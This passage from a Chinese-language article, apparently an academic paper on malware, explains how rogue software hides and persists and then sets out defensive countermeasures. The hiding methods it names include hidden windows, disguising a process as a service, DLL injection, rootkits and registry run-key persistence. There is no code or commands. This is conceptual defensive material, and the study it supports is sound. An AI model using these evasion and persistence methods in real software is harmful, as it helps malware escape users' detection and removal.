隱藏是流氓軟件的天性,也是病毒的一個特征,任何流氓軟件都希望在用戶的電腦中隱藏起來不被發現,由于隱藏的目的,衍生出隱藏的技術。可能的途徑有:①窗口隱藏。惡意軟件的目的就是不想為人所知,因此它們在運行的過程會將自己的程序窗口的屬性設為“不可見”,這樣用戶就看不到程序的窗口了。②進程隱藏。惡意軟件通過調用微軟的一個未公開函數,將本身注冊為服務,這樣系統的任務管理器就無法顯示這類程序的進程了,從而達到了隱藏自己的目的。③文件隱藏。惡意軟件在安裝時將自身拷貝到系統目錄,然后將文件的屬性設置為隱藏,這樣,用戶如果采用的是默認系統設置,
則就無法看到他們。
(二)線程插入技術
線程是Windows系統為程序提供的并行處理機制,它允許一個程序在同一時間建立不同的線程,完成不同的操作。另外,由于Windows操作系統為了提高軟件的復用性,減少重復開發的開銷,采用了動態鏈接庫機制,即將一些公用的程序放在DLL文件中,程序不用包括這些代碼,只要在運行時對這些DLL文件直接進行調用就可以完成各種功能,而惡意軟件正是利用了這一點。他們的可執行程序并不是EXE形式的,而是DLL形式,這類文件一般是存在于系統中,由可執行程序進行調用。
(三)RootKit技術
有些惡意軟件繞過操作系統的API調用,直接利用更底層的調用,然后接管系統的高級API調用,當有程序試圖查找它們時,便返回假信息,從而得以保護自己的技術。
(四)關聯技術
①文件關聯。惡意軟件在進入用戶系統的同時,在系統的不同地方產生多個相同或不同的相關聯文件,一旦一個文件被刪除了,另一個文件就會重新將這個文件恢復。②注冊表關聯。惡意軟件在用戶系統發作的時候,修改注冊表,在run、winlogon、appinst等注冊項中添加相關聯鍵值。③網絡關聯。
三、惡意軟件防范的對策和方法
(一)建立安全的防護體系意識
防范惡意軟件的第一步,就是要有安全的多層意識,一是數據層;二是應用程序層;三是主機層;四是內部網絡層;五是網絡層;六是物理安全層;七是策略、過程和意識層。將安全的多層意識作用在計算機網絡體系中,我們就可以逐層進行分析、進行有效的防范。
(二)安裝防護軟件和清除工具
防護軟件和清除工具是查找和清除惡意軟件的輔助手段。比如Grisoft公司出品的AVG Anti-Spyware是一款致力于確保數據安全,保護您的隱私,抵御間諜軟件,廣告軟件,木馬,撥號程序,鍵盤記錄程序和蠕蟲的威脅的防護軟件,它的惡意軟件查殺能力根據微軟官方網站殺毒評測居世界第4位。
(三)軟件產品的安全原則
軟件開發商為了保證用戶安全,軟件產品的編寫與設計應滿足以下原則:用戶可控制原則;用戶環境安全原則;用戶可操作原則;用戶可移除原則;安裝提示原則。
總的來說,惡意軟件重在防范,大家只要對它有著警惕性,有著安全的上網意識,惡意軟件即使長盛不衰,也不會對我們的工作、生活帶來多大影響。要有不要輕易登陸不了解的網站,因為這樣很有可能會中網頁腳本病毒,從而使系統中上惡意軟件。不要隨便下載不熟 悉的軟件,如果用戶不了解這些軟件,當這些軟件中捆綁一些惡意軟件時,用戶也無法察覺。安裝軟件時應仔細閱讀軟件附帶的用戶協議及使用說明,有些軟件在安裝的過程中會以不引起用戶注意的方式提示用戶要安裝惡意軟件,這時如果用戶不認真看提示的話,就會安裝上惡意軟件。
參考文獻:
[1]黑客的攻擊手段及用戶對策》余建斌, 北京人民郵電出版社1998. .